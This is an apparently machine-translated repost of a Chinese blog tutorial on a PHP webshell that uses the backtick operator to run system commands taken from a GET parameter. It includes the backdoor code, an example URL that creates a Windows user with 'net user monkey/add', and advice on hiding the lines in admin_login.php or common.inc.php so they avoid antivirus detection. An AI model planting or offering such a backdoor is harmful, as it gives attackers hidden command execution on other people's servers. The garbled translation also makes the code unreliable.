Revealing a new webshell Method for PHP

Reprint the wooden JJ without the name of the author.

Author: Monkey blog: www.sbmonkey.com

There are roughly several operators in php.

The functions of operators are divided:
I. Arithmetic Operators (+-*/% + + --)
2. String operators. They can be called connection operators.
Iii. assignment operator = + =-= * =/= % =. =
4. comparison operator ><======<>! =! =
5. logical operators & and | or! Or not
6. bitwise operators & | ^ ~ <> <
7. Other operators? : ''@ =>->::& $

 

In PHP, ''is named as a system operator.

The string contained in ''can be executed as a system command, which is simple ..

In order to escape the soft detection and removal .... A new PHP backdoor came out.

<? Php

$ Houzi = $ _ GET ['monkey'];

Echo '$ houzi ';

?>

Http://www.sbmonkey.com/1.php? Monkey = net user monkey/add

 

Obviously, the content of the monkey variable is net user monkey/add. Only the value of the monkey variable is required for the command to be executed.

We don't have to be so constrained. We can put it in any file.

For example, admin_login.asp

Add these two sentences in the middle to enhance the concealment effect.

$ Houzi = $ _ GET ['monkey'];

Echo '$ houzi ';

Run:

Http://www.bkjia.com/admin/admin_login.php? Monkey = net user monkey/add

 

In the past, some people liked to put backdoors in common. inc. php. In this way, all files in the require file can be used as backdoors.

In this case

We can use it in common. inc. php.

$ GLOBALS ['monkey'] = "net user monkey/add"

To declare a super global variable, and then insert echo '$ houzi' into other files we want to insert ';

This is convenient, and the effect is good without killing.

Defense with caution